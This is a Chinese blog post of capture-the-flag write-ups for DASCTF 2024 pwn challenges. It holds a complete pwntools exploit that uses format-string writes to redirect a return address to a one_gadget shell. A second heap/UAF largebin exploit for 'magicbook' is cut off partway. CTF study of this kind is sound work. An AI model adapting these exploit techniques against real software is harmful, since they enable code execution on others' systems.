<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="M1aoo0bin">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2024/09/12/小题快送/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="2024DASCTF 暑期挑战赛、羊城杯、SEKAI CTF 2024 本来应该暑假就做完的hhh">
<meta property="og:type" content="article">
<meta property="og:title" content="四道小题快送">
<meta property="og:url" content="http://example.com/2024/09/12/%E5%B0%8F%E9%A2%98%E5%BF%AB%E9%80%81/index.html">
<meta property="og:site_name" content="Z1naX5">
<meta property="og:description" content="2024DASCTF 暑期挑战赛、羊城杯、SEKAI CTF 2024 本来应该暑假就做完的hhh">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20240919150809.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241009010338.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE2024-10-14192627.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241018145354.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241018152019.png">
<meta property="article:published_time" content="2024-09-12T11:30:44.000Z">
<meta property="article:modified_time" content="2024-11-04T14:19:20.115Z">
<meta property="article:author" content="Z1naX5">
<meta property="article:tag" content="学习日志">
<meta property="article:tag" content="Pwn">
<meta property="article:tag" content="复现">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20240919150809.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/pic/hello.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/pic/hello.png">
    <meta name="theme-color" content="#3850AB">
    <link rel="shortcut icon" href="/pic/hello.png">
    <!--- Page Info-->
    
    <title>
        
            四道小题快送 -
        
        Zena Xu
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/assets/build/styles.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    

    
        
<script src="/js/libs/anime.min.js"></script>

    

    <script id="hexo-configurations">
    window.config = {"hostname":"example.com","root":"/","language":"en","path":"search.xml"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"title_alignment":"left","headings_top_spacing":{"h1":"5rem","h2":"4rem","h3":"2.8rem","h4":"2.5rem","h5":"2.2rem","h6":"2rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":false,"auto":false,"list":[]},"code_block":{"copy":true,"style":"simple","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":5,"number":true,"expand":true,"init_open":true},"copyright":{"enable":true,"default":"cc_by_nc_sa"},"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#3850AB","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/pic/light_background.jpg","dark":"/pic/dark_background.png"},"title":"M1aoo0bin's Blog","subtitle":{"text":["晚安喵(,,・ω・,,)"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#363636","dark":"#d2dde8"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"style":"default","links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.6.4","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":25},"width":{"home":"1200px","pages":"1200px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Archives":{"path":"/archives/","icon":"fa-regular fa-archive"},"About":{"path":"/about","icon":"fa-regular fa-user"},"Links":{"path":"/links","icon":"fa-regular fa-link"}},"search":{"enable":true,"preload":true},"tags":{"Tags":{"icon":"fa-solid fa-tags","path":"/tags/"}}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":10}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
<!--        <span class="swup-progress-icon">-->
<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
<!--        </span>-->
    
</div>



    <style>
    :root {
        --preloader-background-color: #fff;
        --preloader-text-color: #000;
    }

    @media (prefers-color-scheme: dark) {
        :root {
            --preloader-background-color: #202124;
            --preloader-text-color: #fff;
        }
    }

    @media (prefers-color-scheme: light) {
        :root {
            --preloader-background-color: #fff;
            --preloader-text-color: #000;
        }
    }

    @media (max-width: 600px) {
        .ml13 {
            font-size: 2.6rem !important; /* Adjust this value as needed */
        }
    }

    .preloader {
        display: flex;
        flex-direction: column;
        gap: 1rem; /* Tailwind 'gap-4' is 1rem */
        align-items: center;
        justify-content: center;
        position: fixed;
        padding: 12px;
        top: 0;
        right: 0;
        bottom: 0;
        left: 0;
        width: 100vw;
        height: 100vh; /* 'h-screen' is 100% of the viewport height */
        background-color: var(--preloader-background-color);
        z-index: 1100; /* 'z-[1100]' sets the z-index */
        transition: opacity 0.2s ease-in-out;
    }

    .ml13 {
        font-size: 3.2rem;
        /* text-transform: uppercase; */
        color: var(--preloader-text-color);
        letter-spacing: -1px;
        font-weight: 500;
        font-family: 'Chillax-Variable', sans-serif;
        text-align: center;
    }

    .ml13 .word {
        display: inline-flex;
        flex-wrap: wrap;
        white-space: nowrap;
    }

    .ml13 .letter {
        display: inline-block;
        line-height: 1em;
    }
</style>

<div class="preloader">
    <h2 class="ml13">
        Zena Xu
    </h2>
    <script>
        var textWrapper = document.querySelector('.ml13');
        // Split text into words
        var words = textWrapper.textContent.trim().split(' ');

        // Clear the existing content
        textWrapper.innerHTML = '';

        // Wrap each word and its letters in spans
        words.forEach(function(word) {
            var wordSpan = document.createElement('span');
            wordSpan.classList.add('word');
            wordSpan.innerHTML = word.replace(/\S/g, "<span class='letter'>$&</span>");
            textWrapper.appendChild(wordSpan);
            textWrapper.appendChild(document.createTextNode(' ')); // Add space between words
        });

        var animation = anime.timeline({loop: true})
            .add({
                targets: '.ml13 .letter',
                translateY: [40,0],
                translateZ: 0,
                opacity: [0,1],
                filter: ['blur(5px)', 'blur(0px)'], // Starting from blurred to unblurred
                easing: "easeOutExpo",
                duration: 1400,
                delay: (el, i) => 300 + 30 * i,
            }).add({
                targets: '.ml13 .letter',
                translateY: [0,-40],
                opacity: [1,0],
                filter: ['blur(0px)', 'blur(5px)'], // Ending from unblurred to blurred
                easing: "easeInExpo",
                duration: 1200,
                delay: (el, i) => 100 + 30 * i,
                complete: function() {
                    hidePreloader(); // Call hidePreloader after the animation completes
                }
            });

        let themeStatus = JSON.parse(localStorage.getItem('REDEFINE-THEME-STATUS'))?.isDark;

        // If the theme status is not found in local storage, check the preferred color scheme
        if (themeStatus === undefined || themeStatus === null) {
            if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
                themeStatus = 'dark';
            } else {
                themeStatus = 'light';
            }
        }

        // Now you can use the themeStatus variable in your code
        if (themeStatus) {
            document.documentElement.style.setProperty('--preloader-background-color', '#202124');
            document.documentElement.style.setProperty('--preloader-text-color', '#fff');
        } else {
            document.documentElement.style.setProperty('--preloader-background-color', '#fff');
            document.documentElement.style.setProperty('--preloader-text-color', '#000');
        }

        window.addEventListener('load', function () {
            setTimeout(hidePreloader, 5000); // Call hidePreloader after 5000 milliseconds if not already called by animation
        });

        function hidePreloader() {
            var preloader = document.querySelector('.preloader');
            preloader.style.opacity = '0';
            setTimeout(function () {
                preloader.style.display = 'none';
            }, 200);
        }
    </script>
</div>

<main class="page-container" id="swup">

    

    <div class="main-content-container">


        <div class="main-content-header">
            <header class="navbar-container px-6 md:px-12">

    <div class="navbar-content ">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="/pic/logo.png">
                </a>
            
            <a class="logo-title" href="/">
                
                Zena Xu
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/archives/"
                                        >
                                    <i class="fa-regular fa-archive fa-fw"></i>
                                    ARCHIVES
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/about"
                                        >
                                    <i class="fa-regular fa-user fa-fw"></i>
                                    ABOUT
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/links"
                                        >
                                    <i class="fa-regular fa-link fa-fw"></i>
                                    LINKS
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                        <li class="navbar-item search search-popup-trigger">
                            <i class="fa-solid fa-magnifying-glass"></i>
                        </li>
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fa-solid fa-magnifying-glass"></i>
                    </div>
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-screen w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/archives/"
                        >
                            <span>
                                ARCHIVES
                            </span>
                            
                                <i class="fa-regular fa-archive fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/about"
                        >
                            <span>
                                ABOUT
                            </span>
                            
                                <i class="fa-regular fa-user fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/links"
                        >
                            <span>
                                LINKS
                            </span>
                            
                                <i class="fa-regular fa-link fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">12</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">0</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">19</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="post-page-container flex relative justify-between box-border w-full h-full">
    <div class="article-content-container">

        <div class="article-title relative w-full">
            
                
                
                <img src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/屏幕截图2024-10-14192627.png" alt="四道小题快送" class="w-full h-60 sm:h-72 md:h-80 object-cover sm:rounded-t-large dark:brightness-75"/>
                
                <div class="w-full flex items-center absolute bottom-0 justify-start">
                    <h1 class="article-title-cover text-center mx-6 my-6 text-second-text-color bg-background-color-transparent px-4 py-3 text-3xl sm:text-4xl md:text-5xl font-semibold backdrop-blur-lg rounded-xl border border-border-color ">四道小题快送</h1>
                </div>
            
            </div>

        
            <div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
                <div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
                    <img src="/pic/photo.jpg">
                </div>
                <div class="info flex flex-col justify-between">
                    <div class="author flex items-center">
                        <span class="name text-default-text-color text-lg font-semibold">M1aoo0bin</span>
                        
                    </div>
                    <div class="meta-info">
                        <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2024-09-12 19:30:44</span>
        <span class="mobile">2024-09-12 19:30:44</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2024-11-04 22:19:20</span>
            <span class="mobile">2024-11-04 22:19:20</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/">学习日志</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/Pwn/">Pwn</a>&nbsp;
                    </li>
                
                    <li>
                        | <a href="/tags/%E5%A4%8D%E7%8E%B0/">复现</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fa-regular fa-typewriter"></i>&nbsp;<span>2.7k Words</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fa-regular fa-clock"></i>&nbsp;<span>13 Mins</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                    </div>
                </div>
            </div>
        

        


        <div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
            <h1 id="DASCTF-暑期挑战赛"><a href="#DASCTF-暑期挑战赛" class="headerlink" title="DASCTF 暑期挑战赛"></a>DASCTF 暑期挑战赛</h1><p>这几个题质量还行，虽然有点模板，知识点也很靠前，但是挺扎实的。</p>
<h2 id="springboard"><a href="#springboard" class="headerlink" title="springboard"></a>springboard</h2><p>考点在于非栈上格式化字符串，比较标准的一个题<br>通过格式化字符串更改返回地址为one gadget</p>
<p>找到一个这样的三个指针指在一起的地方，首先让他指到返回地址，也就是修改蓝框里的内容；然后再修改返回地址，也就是修改红框里的内容。</p>
<p>至于为什么要找三个指针而不是两个指针的地方是因为%n是<code>不输出字符，但是把已经成功输出的字符个数写入对应的整型指针参数所指的变量</code>，写入的时候是要解引用一次的。payload里控制的地址是划线的部分，对划线部分的内容（框里第一个数）解引用（框里第二个数）然后改写。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20240919150809.png"
                      alt="20240919150809"
                ><br>、】<br>修改高位的地址可以通过 目标地址+2 的方式</p>
<p>泄露libc则是输出一个栈上和libc相关的地址再计算,也就是泄露图里rbp<code>+008</code>的地方就可以了</p>
<p>exp:</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line">context.arch =<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line">p=process(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">elf=ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">libc=ELF(<span class="string">&quot;./libc.so.6&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># one gadget </span></span><br><span class="line"><span class="comment"># 0x4527a execve(&quot;/bin/sh&quot;, rsp+0x30, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   [rsp+0x30] == NULL || &#123;[rsp+0x30], [rsp+0x38], [rsp+0x40], [rsp+0x48], ...&#125; is a valid argv</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0xf03a4 execve(&quot;/bin/sh&quot;, rsp+0x50, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   [rsp+0x50] == NULL || &#123;[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...&#125; is a valid argv</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 0xf1247 execve(&quot;/bin/sh&quot;, rsp+0x70, environ)</span></span><br><span class="line"><span class="comment"># constraints:</span></span><br><span class="line"><span class="comment">#   [rsp+0x70] == NULL || &#123;[rsp+0x70], [rsp+0x78], [rsp+0x80], [rsp+0x88], ...&#125; is a valid argv</span></span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&quot;a keyword\n&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 1</span></span><br><span class="line">p.sendline(<span class="string">b&#x27;%9$p-%11$p&#x27;</span>)</span><br><span class="line">r=p.recv()</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line">libc_start_main_240=<span class="built_in">int</span>((r[<span class="number">2</span>:<span class="number">14</span>]),<span class="number">16</span>) <span class="comment"># 接收__libc_start_main</span></span><br><span class="line">libc_base=libc_start_main_240-<span class="number">240</span>-libc.sym[<span class="string">&quot;__libc_start_main&quot;</span>]</span><br><span class="line">success(<span class="string">&quot;libc_base=&quot;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">ogs=[<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf03a4</span>,<span class="number">0xf1247</span>]</span><br><span class="line">og=libc_base+ogs[<span class="number">0</span>]</span><br><span class="line">success(<span class="string">&quot;one_gadget=&quot;</span>+<span class="built_in">hex</span>(og))</span><br><span class="line"></span><br><span class="line">stack=<span class="built_in">int</span>(r[<span class="number">17</span>:<span class="number">29</span>],<span class="number">16</span>)</span><br><span class="line">success(<span class="string">&quot;stack=&quot;</span>+<span class="built_in">hex</span>(stack))</span><br><span class="line">stack_main=stack-<span class="number">0xe0</span></span><br><span class="line">success(<span class="string">&quot;stack_main=&quot;</span>+<span class="built_in">hex</span>(stack_main))</span><br><span class="line"></span><br><span class="line"><span class="comment"># 2</span></span><br><span class="line">payload = (<span class="string">&quot;%&quot;</span>+<span class="built_in">str</span>(stack_main&amp;<span class="number">0xffff</span>)+<span class="string">&#x27;c%11$hn&#x27;</span>).encode()</span><br><span class="line">p.sendafter(<span class="string">b&#x27;Please enter a keyword\n&#x27;</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 3</span></span><br><span class="line">payload = <span class="string">b&quot;%&quot;</span>+<span class="built_in">str</span>(og&amp;<span class="number">0xffff</span>).encode()+<span class="string">b&#x27;c%37$hn&#x27;</span></span><br><span class="line">p.sendafter(<span class="string">b&quot;keyword\n&quot;</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 4</span></span><br><span class="line">payload = <span class="string">b&quot;%&quot;</span>+<span class="built_in">str</span>((stack_main+<span class="number">2</span>)&amp;<span class="number">0xffff</span>).encode()+<span class="string">b&#x27;c%11$hn&#x27;</span> <span class="comment"># 改写高地址</span></span><br><span class="line">p.sendafter(<span class="string">b&quot;a keyword\n&quot;</span>,payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># 5</span></span><br><span class="line">payload = <span class="string">b&quot;%&quot;</span>+<span class="built_in">str</span>((og&gt;&gt;<span class="number">16</span>)&amp;<span class="number">0xff</span>).encode()+<span class="string">b&#x27;c%37$hhn&#x27;</span></span><br><span class="line">p.sendafter(<span class="string">b&quot;a keyword\n&quot;</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<h2 id="magicbook"><a href="#magicbook" class="headerlink" title="magicbook"></a>magicbook</h2><p>largebin attack<br>原理可见这篇文章-&gt;<a class="link"   target="_blank" rel="noopener" href="http://zenaxu.cn/2024/07/23/really-ez-largebin/" >图解unsortedbin attack &amp; largebin attack <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<p>UAF,没有 show 函数，但是 delete 的时候很诡异的给了一次“遗言”的机会，配合 UAF 还挺明显的的一个largebin attack（调试的时候更明显，出题人把 fastbin 和 tcache bin 里塞了很多东西）。不过后面接的是栈溢出，倒是也把这个改大数的机制用上了。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://raw.githubusercontent.com/Z1naX5/PicGo/master/images/20241009010338.png"
                      alt="20241009010338"
                ></p>
<p>所以libc泄露也是在栈溢出里面完成，开了沙箱所以就再构造一个 orw </p>
<p>exp:</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line">p = process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">size</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">b&#x27;Your choice:&#x27;</span>,<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">b&#x27;need?\n&#x27;</span>,<span class="built_in">str</span>(size).encode())</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">edit</span>(<span class="params">content</span>):</span><br><span class="line">    p.sendlineafter(<span class="string">b&#x27;Your choice:&#x27;</span>,<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">&#x27;story!\n&#x27;</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">index,choice=<span class="string">b&#x27;n&#x27;</span></span>):</span><br><span class="line">    p.sendlineafter(<span class="string">b&#x27;Your choice:&#x27;</span>,<span class="string">b&#x27;2&#x27;</span>)</span><br><span class="line">    p.sendlineafter(<span class="string">b&#x27;delete?\n&#x27;</span>,<span class="built_in">str</span>(index).encode())</span><br><span class="line">    p.sendlineafter(<span class="string">b&#x27;deleted?(y/n)\n&#x27;</span>,choice)    </span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">b&quot;give you a gift: &quot;</span>)</span><br><span class="line">addr = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>)-<span class="number">0x4010</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x450</span>) <span class="comment"># 0</span></span><br><span class="line">add(<span class="number">0x440</span>) <span class="comment"># 1 防止合并</span></span><br><span class="line">add(<span class="number">0x440</span>) <span class="comment"># 2</span></span><br><span class="line">delete(<span 